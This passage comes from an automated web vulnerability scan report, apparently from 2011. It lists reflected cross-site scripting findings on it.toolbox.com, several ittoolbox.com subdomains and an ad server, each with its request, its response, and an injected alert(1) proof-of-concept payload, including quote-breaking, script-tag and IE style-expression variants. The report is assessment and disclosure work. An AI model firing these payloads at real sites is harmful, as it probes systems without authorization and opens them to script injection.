<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Groups
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7358f'-alert(1)-'29ad29ac991 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /people7358f'-alert(1)-'29ad29ac991/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 114921 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> People Sear ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3f7358f'-alert(1)-'29ad29ac991%2f'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.92. http://it.toolbox.com/people/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/people/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabb0'-alert(1)-'c1d1138c1b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /people/?eabb0'-alert(1)-'c1d1138c1b9=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 114677 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> People Sear ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3feabb0'-alert(1)-'c1d1138c1b9%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f043b'-alert(1)-'d674dcd1e76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /peoplef043b'-alert(1)-'d674dcd1e76/dentrekin/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 114986 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> People Sear ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3ff043b'-alert(1)-'d674dcd1e76%2fdentrekin%2f'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
3.94. http://it.toolbox.com/people/dentrekin/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/people/dentrekin/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abb6e'-alert(1)-'20fe7c87edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /people/dentrekin/?abb6e'-alert(1)-'20fe7c87edd=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 58420 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:48:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Demian Entr ...[SNIP]... ed) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fProfile.aspx%3fdisplayname%3ddentrekin%26abb6e'-alert(1)-'20fe7c87edd%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.95. http://java.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://java.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c3c'-alert(1)-'dbbea786b9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?14c3c'-alert(1)-'dbbea786b9c=1 HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59272 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=puv12c55hmsicw45dskys2un; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:13 GMT Connection: close
3.96. http://java.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://java.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23ef5"style%3d"x%3aexpression(alert(1))"fb0ed0c9733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23ef5"style="x:expression(alert(1))"fb0ed0c9733 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?23ef5"style%3d"x%3aexpression(alert(1))"fb0ed0c9733=1 HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59387 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s3wuxj45cit3vrfhkfjgtc2h; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:09 GMT Connection: close
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 97096<script>alert(1)</script>431b4ab0e87 was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=940&ct=TOOLBOX_ROS97096<script>alert(1)</script>431b4ab0e87&num=5&layt=560x350v1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 26 Jan 2011 14:54:39 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 26 Jan 2011 14:54:39 GMT Content-Type: application/x-javascript Content-Length: 82
// Error: Unknown old section TOOLBOX_ROS97096<script>alert(1)</script>431b4ab0e87
3.98. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jlinks.industrybrains.com
Path: /jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c24a9<script>alert(1)</script>bc533aa9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp&c24a9<script>alert(1)</script>bc533aa9af=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 26 Jan 2011 14:54:45 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 26 Jan 2011 14:54:45 GMT Content-Type: application/x-javascript Content-Length: 68
3.99. http://knowledgemanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://knowledgemanagement.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24513"style%3d"x%3aexpression(alert(1))"6e9c15464a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24513"style="x:expression(alert(1))"6e9c15464a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?24513"style%3d"x%3aexpression(alert(1))"6e9c15464a3=1 HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71503 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=xru5eafarzxxbh45vosz4u45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Knowledge M ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://knowledgemanagement.ittoolbox.com/Default.aspx?24513"style="x:expression(alert(1))"6e9c15464a3=1" /> ...[SNIP]...
3.100. http://knowledgemanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://knowledgemanagement.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b1ec'-alert(1)-'613ef07e3c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8b1ec'-alert(1)-'613ef07e3c0=1 HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71379 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pognpffpdtxcyyyvqhl1t4mr; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Knowledge M ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fknowledgemanagement.ittoolbox.com%2fDefault.aspx%3f8b1ec'-alert(1)-'613ef07e3c0%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.101. http://linux.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://linux.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5b1a'-alert(1)-'1ab6b4baf8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b5b1a'-alert(1)-'1ab6b4baf8e=1 HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72738 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=czqz3pfmadoitl55tflz5z45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Linux Commu ...[SNIP]... der != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2flinux.ittoolbox.com%2fDefault.aspx%3fb5b1a'-alert(1)-'1ab6b4baf8e%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.102. http://linux.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://linux.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caa37"style%3d"x%3aexpression(alert(1))"6417fbb4293 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as caa37"style="x:expression(alert(1))"6417fbb4293 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?caa37"style%3d"x%3aexpression(alert(1))"6417fbb4293=1 HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72853 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=datgxxzqmexdo5qyjrao4gur; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Linux Commu ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://linux.ittoolbox.com/Default.aspx?caa37"style="x:expression(alert(1))"6417fbb4293=1" /> ...[SNIP]...
3.103. http://networking.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://networking.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fef2c'-alert(1)-'f02e1021037 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fef2c'-alert(1)-'f02e1021037=1 HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 91891 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=a3uzlqvxnlhivdrz04yt0mmb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:37 GMT Connection: close
3.104. http://networking.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://networking.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd60"style%3d"x%3aexpression(alert(1))"71a53d9ebfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfd60"style="x:expression(alert(1))"71a53d9ebfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?cfd60"style%3d"x%3aexpression(alert(1))"71a53d9ebfe=1 HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 92006 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sxo2pe2p42mght553estfm45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Networking ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://networking.ittoolbox.com/Default.aspx?cfd60"style="x:expression(alert(1))"71a53d9ebfe=1" /> ...[SNIP]...
3.105. http://oracle.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://oracle.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c2f"style%3d"x%3aexpression(alert(1))"e4fee16d211 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c2f"style="x:expression(alert(1))"e4fee16d211 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?89c2f"style%3d"x%3aexpression(alert(1))"e4fee16d211=1 HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78373 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lau5lk55ph141tnfnn3hg4ra; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Oracle Comm ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://oracle.ittoolbox.com/Default.aspx?89c2f"style="x:expression(alert(1))"e4fee16d211=1" /> ...[SNIP]...
3.106. http://oracle.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://oracle.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4e1'-alert(1)-'3a93052e948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2b4e1'-alert(1)-'3a93052e948=1 HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78256 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=0dsxwmvpz4gckl553jtpamv2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Oracle Comm ...[SNIP]... er != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2foracle.ittoolbox.com%2fDefault.aspx%3f2b4e1'-alert(1)-'3a93052e948%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.107. http://peoplesoft.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://peoplesoft.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35918"style%3d"x%3aexpression(alert(1))"3060ac84ade was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35918"style="x:expression(alert(1))"3060ac84ade in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?35918"style%3d"x%3aexpression(alert(1))"3060ac84ade=1 HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71238 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=i3igbt55zmfzngqpx3zc25jr; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> PeopleSoft ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://peoplesoft.ittoolbox.com/Default.aspx?35918"style="x:expression(alert(1))"3060ac84ade=1" /> ...[SNIP]...
3.108. http://peoplesoft.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://peoplesoft.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61edb'-alert(1)-'896663fa1e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?61edb'-alert(1)-'896663fa1e4=1 HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
